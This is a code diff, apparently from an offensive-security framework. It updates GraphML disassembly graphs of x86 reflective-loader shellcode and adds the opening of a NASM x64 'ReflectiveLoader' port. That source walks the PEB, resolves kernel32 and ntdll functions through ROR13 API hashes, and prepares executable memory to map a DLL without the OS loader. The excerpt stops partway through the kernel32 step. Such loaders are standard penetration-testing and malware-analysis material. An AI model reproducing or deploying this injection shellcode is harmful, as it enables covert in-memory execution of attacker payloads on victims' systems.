-    <node id="block.0x140c">
-      <data key="address">0x140c</data>
+    <node id="block.0x140a">
+      <data key="address">0x140a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x140c</data>
+        <data key="address">0x140a</data>
         <data key="type">instructions</data>
-        <node id="block.0x140c:instruction.0x140c">
-          <data key="address">0x140c</data>
+        <node id="block.0x140a:instruction.0x140a">
+          <data key="address">0x140a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b45c4</data>
           <data key="instruction.source">mov eax, dword ptr [ebp - 0x3c]</data>
         </node>
-        <node id="block.0x140c:instruction.0x140f">
-          <data key="address">0x140f</data>
+        <node id="block.0x140a:instruction.0x140d">
+          <data key="address">0x140d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5f</data>
           <data key="instruction.source">pop edi</data>
         </node>
-        <node id="block.0x140c:instruction.0x1410">
-          <data key="address">0x1410</data>
+        <node id="block.0x140a:instruction.0x140e">
+          <data key="address">0x140e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5e</data>
           <data key="instruction.source">pop esi</data>
         </node>
-        <node id="block.0x140c:instruction.0x1411">
-          <data key="address">0x1411</data>
+        <node id="block.0x140a:instruction.0x140f">
+          <data key="address">0x140f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5b</data>
           <data key="instruction.source">pop ebx</data>
         </node>
-        <node id="block.0x140c:instruction.0x1412">
-          <data key="address">0x1412</data>
+        <node id="block.0x140a:instruction.0x1410">
+          <data key="address">0x1410</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">89ec</data>
           <data key="instruction.source">mov esp, ebp</data>
         </node>
-        <node id="block.0x140c:instruction.0x1414">
-          <data key="address">0x1414</data>
+        <node id="block.0x140a:instruction.0x1412">
+          <data key="address">0x1412</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">5d</data>
           <data key="instruction.source">pop ebp</data>
         </node>
-        <node id="block.0x140c:instruction.0x1415">
-          <data key="address">0x1415</data>
+        <node id="block.0x140a:instruction.0x1413">
+          <data key="address">0x1413</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
-        <edge source="block.0x140c:instruction.0x140c" target="block.0x140c:instruction.0x1414"/>
-        <edge source="block.0x140c:instruction.0x140f" target="block.0x140c:instruction.0x1410"/>
-        <edge source="block.0x140c:instruction.0x1410" target="block.0x140c:instruction.0x1411"/>
-        <edge source="block.0x140c:instruction.0x1411" target="block.0x140c:instruction.0x1412"/>
-        <edge source="block.0x140c:instruction.0x1412" target="block.0x140c:instruction.0x1414"/>
-        <edge source="block.0x140c:instruction.0x1414" target="block.0x140c:instruction.0x1415"/>
+        <edge source="block.0x140a:instruction.0x140a" target="block.0x140a:instruction.0x1412"/>
+        <edge source="block.0x140a:instruction.0x140d" target="block.0x140a:instruction.0x140e"/>
+        <edge source="block.0x140a:instruction.0x140e" target="block.0x140a:instruction.0x140f"/>
+        <edge source="block.0x140a:instruction.0x140f" target="block.0x140a:instruction.0x1410"/>
+        <edge source="block.0x140a:instruction.0x1410" target="block.0x140a:instruction.0x1412"/>
+        <edge source="block.0x140a:instruction.0x1412" target="block.0x140a:instruction.0x1413"/>
       </graph>
     </node>
-    <node id="block.0x1416">
-      <data key="address">0x1416</data>
+    <node id="block.0x1414">
+      <data key="address">0x1414</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1416</data>
+        <data key="address">0x1414</data>
         <data key="type">instructions</data>
-        <node id="block.0x1416:instruction.0x1416">
-          <data key="address">0x1416</data>
+        <node id="block.0x1414:instruction.0x1414">
+          <data key="address">0x1414</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4201</data>
           <data key="instruction.source">mov eax, dword ptr [edx + 1]</data>
         </node>
-        <node id="block.0x1416:instruction.0x1419">
-          <data key="address">0x1419</data>
+        <node id="block.0x1414:instruction.0x1417">
+          <data key="address">0x1417</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8d5205</data>
           <data key="instruction.source">lea edx, [edx + 5]</data>
         </node>
-        <node id="block.0x1416:instruction.0x141c">
-          <data key="address">0x141c</data>
+        <node id="block.0x1414:instruction.0x141a">
+          <data key="address">0x141a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ffe2</data>
           <data key="instruction.source">jmp edx</data>
         </node>
-        <edge source="block.0x1416:instruction.0x1416" target="block.0x1416:instruction.0x1419"/>
-        <edge source="block.0x1416:instruction.0x1419" target="block.0x1416:instruction.0x141c"/>
+        <edge source="block.0x1414:instruction.0x1414" target="block.0x1414:instruction.0x1417"/>
+        <edge source="block.0x1414:instruction.0x1417" target="block.0x1414:instruction.0x141a"/>
       </graph>
     </node>
-    <node id="block.0x141e">
-      <data key="address">0x141e</data>
+    <node id="block.0x141c">
+      <data key="address">0x141c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x141e</data>
+        <data key="address">0x141c</data>
         <data key="type">instructions</data>
-        <node id="block.0x141e:instruction.0x141e">
-          <data key="address">0x141e</data>
+        <node id="block.0x141c:instruction.0x141c">
+          <data key="address">0x141c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b55e8</data>
           <data key="instruction.source">mov edx, dword ptr [ebp - 0x18]</data>
         </node>
-        <node id="block.0x141e:instruction.0x1421">
-          <data key="address">0x1421</data>
+        <node id="block.0x141c:instruction.0x141f">
+          <data key="address">0x141f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b423c</data>
           <data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
         </node>
-        <node id="block.0x141e:instruction.0x1424">
-          <data key="address">0x1424</data>
+        <node id="block.0x141c:instruction.0x1422">
+          <data key="address">0x1422</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
         </node>
-        <node id="block.0x141e:instruction.0x1426">
-          <data key="address">0x1426</data>
+        <node id="block.0x141c:instruction.0x1424">
+          <data key="address">0x1424</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4078</data>
           <data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
         </node>
-        <node id="block.0x141e:instruction.0x1429">
-          <data key="address">0x1429</data>
+        <node id="block.0x141c:instruction.0x1427">
+          <data key="address">0x1427</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d0</data>
           <data key="instruction.source">add eax, edx</data>
         </node>
-        <node id="block.0x141e:instruction.0x142b">
-          <data key="address">0x142b</data>
+        <node id="block.0x141c:instruction.0x1429">
+          <data key="address">0x1429</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8945e0</data>
           <data key="instruction.source">mov dword ptr [ebp - 0x20], eax</data>
         </node>
-        <node id="block.0x141e:instruction.0x142e">
-          <data key="address">0x142e</data>
+        <node id="block.0x141c:instruction.0x142c">
+          <data key="address">0x142c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4818</data>
           <data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
         </node>
-        <node id="block.0x141e:instruction.0x1431">
-          <data key="address">0x1431</data>
+        <node id="block.0x141c:instruction.0x142f">
+          <data key="address">0x142f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">894dc8</data>
           <data key="instruction.source">mov dword ptr [ebp - 0x38], ecx</data>
         </node>
-        <node id="block.0x141e:instruction.0x1434">
-          <data key="address">0x1434</data>
+        <node id="block.0x141c:instruction.0x1432">
+          <data key="address">0x1432</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4820</data>
           <data key="instruction.source">mov ecx, dword ptr [eax + 0x20]</data>
         </node>
-        <node id="block.0x141e:instruction.0x1437">
-          <data key="address">0x1437</data>
+        <node id="block.0x141c:instruction.0x1435">
+          <data key="address">0x1435</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d1</data>
           <data key="instruction.source">add ecx, edx</data>
         </node>
-        <node id="block.0x141e:instruction.0x1439">
-          <data key="address">0x1439</data>
+        <node id="block.0x141c:instruction.0x1437">
+          <data key="address">0x1437</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">894ddc</data>
           <data key="instruction.source">mov dword ptr [ebp - 0x24], ecx</data>
         </node>
-        <node id="block.0x141e:instruction.0x143c">
-          <data key="address">0x143c</data>
+        <node id="block.0x141c:instruction.0x143a">
+          <data key="address">0x143a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b4824</data>
           <data key="instruction.source">mov ecx, dword ptr [eax + 0x24]</data>
         </node>
-        <node id="block.0x141e:instruction.0x143f">
-          <data key="address">0x143f</data>
+        <node id="block.0x141c:instruction.0x143d">
+          <data key="address">0x143d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d1</data>
           <data key="instruction.source">add ecx, edx</data>
         </node>
-        <node id="block.0x141e:instruction.0x1441">
-          <data key="address">0x1441</data>
+        <node id="block.0x141c:instruction.0x143f">
+          <data key="address">0x143f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">894dd8</data>
           <data key="instruction.source">mov dword ptr [ebp - 0x28], ecx</data>
         </node>
-        <node id="block.0x141e:instruction.0x1444">
-          <data key="address">0x1444</data>
+        <node id="block.0x141c:instruction.0x1442">
+          <data key="address">0x1442</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
-        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1421"/>
-        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1424"/>
-        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1429"/>
-        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1437"/>
-        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x143f"/>
-        <edge source="block.0x141e:instruction.0x1421" target="block.0x141e:instruction.0x1424"/>
-        <edge source="block.0x141e:instruction.0x1421" target="block.0x141e:instruction.0x142b"/>
-        <edge source="block.0x141e:instruction.0x1424" target="block.0x141e:instruction.0x1426"/>
-        <edge source="block.0x141e:instruction.0x1424" target="block.0x141e:instruction.0x1429"/>
-        <edge source="block.0x141e:instruction.0x1426" target="block.0x141e:instruction.0x1429"/>
-        <edge source="block.0x141e:instruction.0x1426" target="block.0x141e:instruction.0x142b"/>
-        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x142b"/>
-        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x142e"/>
-        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x1434"/>
-        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x1437"/>
-        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x143c"/>
-        <edge source="block.0x141e:instruction.0x142b" target="block.0x141e:instruction.0x142e"/>
-        <edge source="block.0x141e:instruction.0x142e" target="block.0x141e:instruction.0x1431"/>
-        <edge source="block.0x141e:instruction.0x142e" target="block.0x141e:instruction.0x1434"/>
-        <edge source="block.0x141e:instruction.0x1431" target="block.0x141e:instruction.0x1434"/>
-        <edge source="block.0x141e:instruction.0x1434" target="block.0x141e:instruction.0x1437"/>
-        <edge source="block.0x141e:instruction.0x1434" target="block.0x141e:instruction.0x1439"/>
-        <edge source="block.0x141e:instruction.0x1437" target="block.0x141e:instruction.0x1439"/>
-        <edge source="block.0x141e:instruction.0x1437" target="block.0x141e:instruction.0x143c"/>
-        <edge source="block.0x141e:instruction.0x1437" target="block.0x141e:instruction.0x143f"/>
-        <edge source="block.0x141e:instruction.0x1439" target="block.0x141e:instruction.0x143c"/>
-        <edge source="block.0x141e:instruction.0x143c" target="block.0x141e:instruction.0x143f"/>
-        <edge source="block.0x141e:instruction.0x143c" target="block.0x141e:instruction.0x1441"/>
-        <edge source="block.0x141e:instruction.0x143f" target="block.0x141e:instruction.0x1441"/>
-        <edge source="block.0x141e:instruction.0x1441" target="block.0x141e:instruction.0x1444"/>
+        <edge source="block.0x141c:instruction.0x141c" target="block.0x141c:instruction.0x141f"/>
+        <edge source="block.0x141c:instruction.0x141c" target="block.0x141c:instruction.0x1422"/>
+        <edge source="block.0x141c:instruction.0x141c" target="block.0x141c:instruction.0x1427"/>
+        <edge source="block.0x141c:instruction.0x141c" target="block.0x141c:instruction.0x1435"/>
+        <edge source="block.0x141c:instruction.0x141c" target="block.0x141c:instruction.0x143d"/>
+        <edge source="block.0x141c:instruction.0x141f" target="block.0x141c:instruction.0x1422"/>
+        <edge source="block.0x141c:instruction.0x141f" target="block.0x141c:instruction.0x1429"/>
+        <edge source="block.0x141c:instruction.0x1422" target="block.0x141c:instruction.0x1424"/>
+        <edge source="block.0x141c:instruction.0x1422" target="block.0x141c:instruction.0x1427"/>
+        <edge source="block.0x141c:instruction.0x1424" target="block.0x141c:instruction.0x1427"/>
+        <edge source="block.0x141c:instruction.0x1424" target="block.0x141c:instruction.0x1429"/>
+        <edge source="block.0x141c:instruction.0x1427" target="block.0x141c:instruction.0x1429"/>
+        <edge source="block.0x141c:instruction.0x1427" target="block.0x141c:instruction.0x142c"/>
+        <edge source="block.0x141c:instruction.0x1427" target="block.0x141c:instruction.0x1432"/>
+        <edge source="block.0x141c:instruction.0x1427" target="block.0x141c:instruction.0x1435"/>
+        <edge source="block.0x141c:instruction.0x1427" target="block.0x141c:instruction.0x143a"/>
+        <edge source="block.0x141c:instruction.0x1429" target="block.0x141c:instruction.0x142c"/>
+        <edge source="block.0x141c:instruction.0x142c" target="block.0x141c:instruction.0x142f"/>
+        <edge source="block.0x141c:instruction.0x142c" target="block.0x141c:instruction.0x1432"/>
+        <edge source="block.0x141c:instruction.0x142f" target="block.0x141c:instruction.0x1432"/>
+        <edge source="block.0x141c:instruction.0x1432" target="block.0x141c:instruction.0x1435"/>
+        <edge source="block.0x141c:instruction.0x1432" target="block.0x141c:instruction.0x1437"/>
+        <edge source="block.0x141c:instruction.0x1435" target="block.0x141c:instruction.0x1437"/>
+        <edge source="block.0x141c:instruction.0x1435" target="block.0x141c:instruction.0x143a"/>
+        <edge source="block.0x141c:instruction.0x1435" target="block.0x141c:instruction.0x143d"/>
+        <edge source="block.0x141c:instruction.0x1437" target="block.0x141c:instruction.0x143a"/>
+        <edge source="block.0x141c:instruction.0x143a" target="block.0x141c:instruction.0x143d"/>
+        <edge source="block.0x141c:instruction.0x143a" target="block.0x141c:instruction.0x143f"/>
+        <edge source="block.0x141c:instruction.0x143d" target="block.0x141c:instruction.0x143f"/>
+        <edge source="block.0x141c:instruction.0x143f" target="block.0x141c:instruction.0x1442"/>
       </graph>
     </node>
-    <node id="block.0x1445">
-      <data key="address">0x1445</data>
+    <node id="block.0x1443">
+      <data key="address">0x1443</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1445</data>
+        <data key="address">0x1443</data>
         <data key="type">instructions</data>
-        <node id="block.0x1445:instruction.0x1445">
-          <data key="address">0x1445</data>
+        <node id="block.0x1443:instruction.0x1443">
+          <data key="address">0x1443</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">b800000000</data>
           <data key="instruction.source">mov eax, 0</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x144a">
-      <data key="address">0x144a</data>
+    <node id="block.0x1448">
+      <data key="address">0x1448</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x144a</data>
+        <data key="address">0x1448</data>
         <data key="type">instructions</data>
-        <node id="block.0x144a:instruction.0x144a">
-          <data key="address">0x144a</data>
+        <node id="block.0x1448:instruction.0x1448">
+          <data key="address">0x1448</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0fb619</data>
           <data key="instruction.source">movzx ebx, byte ptr [ecx]</data>
         </node>
-        <node id="block.0x144a:instruction.0x144d">
-          <data key="address">0x144d</data>
+        <node id="block.0x1448:instruction.0x144b">
+          <data key="address">0x144b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85db</data>
           <data key="instruction.source">test ebx, ebx</data>
         </node>
-        <node id="block.0x144a:instruction.0x144f">
-          <data key="address">0x144f</data>
+        <node id="block.0x1448:instruction.0x144d">
+          <data key="address">0x144d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7408</data>
-          <data key="instruction.source">je 0x1459</data>
+          <data key="instruction.source">je 0x1457</data>
         </node>
-        <edge source="block.0x144a:instruction.0x144a" target="block.0x144a:instruction.0x144d"/>
-        <edge source="block.0x144a:instruction.0x144d" target="block.0x144a:instruction.0x144f"/>
+        <edge source="block.0x1448:instruction.0x1448" target="block.0x1448:instruction.0x144b"/>
+        <edge source="block.0x1448:instruction.0x144b" target="block.0x1448:instruction.0x144d"/>
       </graph>
     </node>
-    <node id="block.0x1451">
-      <data key="address">0x1451</data>
+    <node id="block.0x144f">
+      <data key="address">0x144f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1451</data>
+        <data key="address">0x144f</data>
         <data key="type">instructions</data>
-        <node id="block.0x1451:instruction.0x1451">
-          <data key="address">0x1451</data>
+        <node id="block.0x144f:instruction.0x144f">
+          <data key="address">0x144f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c1c80d</data>
           <data key="instruction.source">ror eax, 0xd</data>
         </node>
-        <node id="block.0x1451:instruction.0x1454">
-          <data key="address">0x1454</data>
+        <node id="block.0x144f:instruction.0x1452">
+          <data key="address">0x1452</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">01d8</data>
           <data key="instruction.source">add eax, ebx</data>
         </node>
-        <node id="block.0x1451:instruction.0x1456">
-          <data key="address">0x1456</data>
+        <node id="block.0x144f:instruction.0x1454">
+          <data key="address">0x1454</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41</data>
           <data key="instruction.source">inc ecx</data>
         </node>
-        <node id="block.0x1451:instruction.0x1457">
-          <data key="address">0x1457</data>
+        <node id="block.0x144f:instruction.0x1455">
+          <data key="address">0x1455</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ebf1</data>
-          <data key="instruction.source">jmp 0x144a</data>
+          <data key="instruction.source">jmp 0x1448</data>
         </node>
-        <edge source="block.0x1451:instruction.0x1451" target="block.0x1451:instruction.0x1454"/>
-        <edge source="block.0x1451:instruction.0x1454" target="block.0x1451:instruction.0x1456"/>
-        <edge source="block.0x1451:instruction.0x1456" target="block.0x1451:instruction.0x1457"/>
+        <edge source="block.0x144f:instruction.0x144f" target="block.0x144f:instruction.0x1452"/>
+        <edge source="block.0x144f:instruction.0x1452" target="block.0x144f:instruction.0x1454"/>
+        <edge source="block.0x144f:instruction.0x1454" target="block.0x144f:instruction.0x1455"/>
       </graph>
     </node>
-    <node id="block.0x1459">
-      <data key="address">0x1459</data>
+    <node id="block.0x1457">
+      <data key="address">0x1457</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1459</data>
+        <data key="address">0x1457</data>
         <data key="type">instructions</data>
-        <node id="block.0x1459:instruction.0x1459">
-          <data key="address">0x1459</data>
+        <node id="block.0x1457:instruction.0x1457">
+          <data key="address">0x1457</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">c3</data>
           <data key="instruction.source">ret</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x145a">
-      <data key="address">0x145a</data>
+    <node id="block.0x1458">
+      <data key="address">0x1458</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x145a</data>
+        <data key="address">0x1458</data>
         <data key="type">instructions</data>
-        <node id="block.0x145a:instruction.0x145a">
-          <data key="address">0x145a</data>
+        <node id="block.0x1458:instruction.0x1458">
+          <data key="address">0x1458</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e841ffffff</data>
+          <data key="instruction.hex">e843ffffff</data>
           <data key="instruction.source">call 0x13a0</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x145f">
-      <data key="address">0x145f</data>
+    <node id="block.0x145d">
+      <data key="address">0x145d</data>
       <data key="type">data</data>
       <data key="data.hex">0110022004400440</data>
     </node>
@@ -3602,19 +3593,18 @@
     <edge source="block.0x1382" target="block.0x1388"/>
     <edge source="block.0x1388" target="block.0x1392"/>
     <edge source="block.0x1392" target="block.0x13a0"/>
-    <edge source="block.0x13a0" target="block.0x13a7"/>
-    <edge source="block.0x13a7" target="block.0x13dc"/>
-    <edge source="block.0x13dc" target="block.0x13df"/>
-    <edge source="block.0x13df" target="block.0x13e8"/>
-    <edge source="block.0x13e8" target="block.0x1402"/>
-    <edge source="block.0x1402" target="block.0x140c"/>
-    <edge source="block.0x140c" target="block.0x1416"/>
-    <edge source="block.0x1416" target="block.0x141e"/>
-    <edge source="block.0x141e" target="block.0x1445"/>
-    <edge source="block.0x1445" target="block.0x144a"/>
-    <edge source="block.0x144a" target="block.0x1451"/>
-    <edge source="block.0x1451" target="block.0x1459"/>
-    <edge source="block.0x1459" target="block.0x145a"/>
-    <edge source="block.0x145a" target="block.0x145f"/>
+    <edge source="block.0x13a0" target="block.0x13da"/>
+    <edge source="block.0x13da" target="block.0x13dd"/>
+    <edge source="block.0x13dd" target="block.0x13e6"/>
+    <edge source="block.0x13e6" target="block.0x1400"/>
+    <edge source="block.0x1400" target="block.0x140a"/>
+    <edge source="block.0x140a" target="block.0x1414"/>
+    <edge source="block.0x1414" target="block.0x141c"/>
+    <edge source="block.0x141c" target="block.0x1443"/>
+    <edge source="block.0x1443" target="block.0x1448"/>
+    <edge source="block.0x1448" target="block.0x144f"/>
+    <edge source="block.0x144f" target="block.0x1457"/>
+    <edge source="block.0x1457" target="block.0x1458"/>
+    <edge source="block.0x1458" target="block.0x145d"/>
   </graph>
 </graphml>

--- a/data/shellcode/reflective_loader.x86.graphml
+++ b/data/shellcode/reflective_loader.x86.graphml
@@ -266,8 +266,8 @@
         <node id="block.0x104b:instruction.0x104b">
           <data key="address">0x104b</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">81e900100000</data>
-          <data key="instruction.source">sub ecx, 0x1000</data>
+          <data key="instruction.hex">83e901</data>
+          <data key="instruction.source">sub ecx, 0x1</data>
         </node>
         <node id="block.0x104b:instruction.0x1051">
           <data key="address">0x1051</data>

--- a/external/source/shellcode/windows/x64/src/reflective_loader.asm
+++ b/external/source/shellcode/windows/x64/src/reflective_loader.asm
@@ -1,0 +1,734 @@
+; =============================================================================
+; ReflectiveLoader x64 - Position Independent Shellcode
+; Port of: https://github.com/stephenfewer/ReflectiveDLLInjection
+; Original author: Stephen Fewer / Harmony Security
+; Author of this port: jbx81 (github.com/jbx81-1337)
+; NASM syntax, Microsoft x64 ABI, no relocations
+; Assemble: nasm -f bin reflective_loader.asm -o reflective_loader.bin
+; =============================================================================
+
+BITS 64
+DEFAULT REL
+
+; ---------------------------------------------------------------------------
+; Hash constants (from ReflectiveLoader.h)
+; ---------------------------------------------------------------------------
+KERNEL32DLL_HASH            EQU 0x6A4ABC5B
+NTDLLDLL_HASH               EQU 0x3CFA685D
+LOADLIBRARYA_HASH           EQU 0xEC0E4E8E
+GETPROCADDRESS_HASH         EQU 0x7C0DFCAA
+ZWALLOCATEVIRTUALMEMORY_HASH EQU 0xD33D4AED
+ZWPROTECTVIRTUALMEMORY_HASH EQU 0xBC3F4D89
+NTFLUSHINSTRUCTIONCACHE_HASH EQU 0x534C0AB8
+
+; PE / reloc constants
+IMAGE_DOS_SIGNATURE         EQU 0x5A4D
+IMAGE_NT_SIGNATURE          EQU 0x00004550
+IMAGE_ORDINAL_FLAG64        EQU 0x8000000000000000
+IMAGE_REL_BASED_ABSOLUTE    EQU 0
+IMAGE_REL_BASED_HIGHLOW     EQU 3
+IMAGE_REL_BASED_DIR64       EQU 10
+
+MEM_RESERVE                 EQU 0x2000
+MEM_COMMIT                  EQU 0x1000
+PAGE_EXECUTE_READWRITE      EQU 0x40
+DLL_PROCESS_ATTACH          EQU 1
+
+; ---------------------------------------------------------------------------
+; Stack frame layout (rbp-based, 8-byte slots after shadow+locals)
+; We reserve space for locals via sub rsp,N in the prologue.
+; Slot names (negative offsets from rbp after push rbp / mov rbp,rsp):
+;   [rbp - 8 ]  = pLoadLibraryA
+;   [rbp - 16]  = pGetProcAddress
+;   [rbp - 24]  = pZwAllocateVirtualMemory
+;   [rbp - 32]  = pNtFlushInstructionCache
+;   [rbp - 40]  = uiLibraryAddress  (image scan ptr / later delta)
+;   [rbp - 48]  = uiBaseAddress     (new alloc / kernel32 base)
+;   [rbp - 56]  = uiHeaderValue     (NT header VA)
+;   [rbp - 64]  = uiExportDir
+;   [rbp - 72]  = uiNameArray
+;   [rbp - 80]  = uiNameOrdinals
+;   [rbp - 88]  = uiAddressArray
+;   [rbp - 96]  = uiValueA          (saved module list entry pointer)
+;   [rbp - 104] = uiValueB
+;   [rbp - 112] = uiValueC
+;   [rbp - 120] = uiValueD
+;   [rbp - 128] = uiValueE
+;   [rbp - 136] = usCounter  (USHORT, stored as qword)
+;   [rbp - 144] = dwHashValue
+;   [rbp - 152] = pZwProtectVirtualMemory
+; ---------------------------------------------------------------------------
+%define pLoadLibraryA           qword [rbp -   8]
+%define pGetProcAddress         qword [rbp -  16]
+%define pZwAllocateVirtualMemory qword [rbp -  24]
+%define pNtFlushInstructionCache qword [rbp - 32]
+%define uiLibraryAddress        qword [rbp -  40]
+%define uiBaseAddress           qword [rbp -  48]
+%define uiHeaderValue           qword [rbp -  56]
+%define uiExportDir             qword [rbp -  64]
+%define uiNameArray             qword [rbp -  72]
+%define uiNameOrdinals          qword [rbp -  80]
+%define uiAddressArray          qword [rbp -  88]
+%define uiValueA                qword [rbp -  96]
+%define uiValueB                qword [rbp - 104]
+%define uiValueC                qword [rbp - 112]
+%define uiValueD                qword [rbp - 120]
+%define uiValueE                qword [rbp - 128]
+%define usCounter               qword [rbp - 136]
+%define dwHashValue             qword [rbp - 144]
+%define pZwProtectVirtualMemory  qword [rbp - 152]
+
+; ============================================================================
+; Entry: ReflectiveLoader()
+;   rcx = image base (if nonzero), else auto-detect via RIP scan
+;   Returns in RAX: VA of DllMain in newly mapped image
+; ============================================================================
+global ReflectiveLoader
+ReflectiveLoader:
+    ; ---- prologue -----------------------------------------------------------
+    push    rbp
+    mov     rbp, rsp
+    sub     rsp, 0xA0           ; 144 bytes locals + 16-byte align padding
+    and     rsp, 0xFFFFFFFFFFFFFFF0
+    push    rbx
+    push    rsi
+    push    rdi
+    push    r12
+    push    r13
+    push    r14
+    push    r15
+
+    ; zero the function pointer slots
+    xor     rax, rax
+    mov     pLoadLibraryA,            rax
+    mov     pGetProcAddress,          rax
+    mov     pZwAllocateVirtualMemory, rax
+    mov     pNtFlushInstructionCache, rax
+    mov     pZwProtectVirtualMemory,  rax
+    xor     rcx, rcx                     ; disable base address as parameter. compatible with standard reflective loader.
+    test    rcx, rcx
+    jnz     .found_base
+
+    ; =========================================================================
+    ; STEP 0: find our own image base by scanning backwards from RIP
+    ; =========================================================================
+    call    .get_rip
+.get_rip:
+    pop     rcx                         ; rcx = address of this pop instruction
+
+    ; page-align downward and scan for MZ + valid PE signature
+    and     rcx, 0xFFFFFFFFFFFFF000     ; page-align
+.scan_page:
+    mov     ax, word [rcx]
+    cmp     ax, IMAGE_DOS_SIGNATURE     ; 'MZ'
+    jne     .next_page
+    ; check e_lfanew range [sizeof(IMAGE_DOS_HEADER)=0x40 .. 0x400)
+    mov     eax, dword [rcx + 0x3C]    ; e_lfanew
+    cmp     eax, 0x40
+    jb      .next_page
+    cmp     eax, 0x400
+    jae     .next_page
+    ; check NT signature
+    lea     rdx, [rcx + rax]
+    mov     eax, dword [rdx]
+    cmp     eax, IMAGE_NT_SIGNATURE     ; 'PE\0\0'
+    je      .found_base
+.next_page:
+    sub     rcx, 0x1000
+    jmp     .scan_page
+
+.found_base:
+    ; rcx = our DLL image base
+    mov     uiLibraryAddress, rcx       ; save original (source) base
+
+    ; =========================================================================
+    ; STEP 1: walk PEB -> LDR -> InMemoryOrderModuleList
+    ;         find kernel32 and ntdll, resolve 5 function pointers by hash
+    ; =========================================================================
+    ; x64: PEB at GS:[0x60]
+    mov     rax, qword gs:[0x60]        ; rax = PEB
+    mov     rax, [rax + 0x18]           ; rax = PEB.Ldr (PEB_LDR_DATA*)
+    mov     rax, [rax + 0x20]           ; rax = InMemoryOrderModuleList.Flink
+
+.walk_modules:
+    test    rax, rax
+    jz      .step2
+
+    ; Save module list entry pointer so we can advance after processing
+    mov     uiValueA, rax
+
+    ; Offsets relative to the InMemoryOrder Flink pointer (entry start):
+    ;   DllBase             = +0x20
+    ;   BaseDllName.Length  = +0x48
+    ;   BaseDllName.Buffer  = +0x50  (PWSTR, points to UTF-16LE name)
+
+    movzx   rcx, word [rax + 0x48]     ; BaseDllName.Length (bytes)
+    test    rcx, rcx
+    jz      .next_module
+    mov     rdx, [rax + 0x50]          ; BaseDllName.Buffer (PWSTR)
+
+    ; hash the module name (byte-by-byte over UTF-16LE, uppercase normalize)
+    mov     r12d, 0                   ; r12d = hash accumulator
+.hash_modname:
+    ror     r12d, 13
+    movzx   ebx, byte [rdx]
+    cmp     bl, 'a'
+    jb      .hash_no_upper
+    sub     bl, 0x20                    ; to uppercase
+.hash_no_upper:
+    add     r12d, ebx
+    inc     rdx
+    dec     rcx
+    jnz     .hash_modname
+
+    ; check hashes
+    cmp     r12d, KERNEL32DLL_HASH
+    je      .process_kernel32
+    cmp     r12d, NTDLLDLL_HASH
+    je      .process_ntdll
+    jmp     .next_module
+
+    ; ------------------------------------------------------------------
+    ; process_kernel32: find LoadLibraryA, GetProcAddress
+    ; ------------------------------------------------------------------
+.process_kernel32:
+    mov     rax, uiValueA              ; restore module entry pointer
+    mov     r13, [rax + 0x20]          ; DllBase
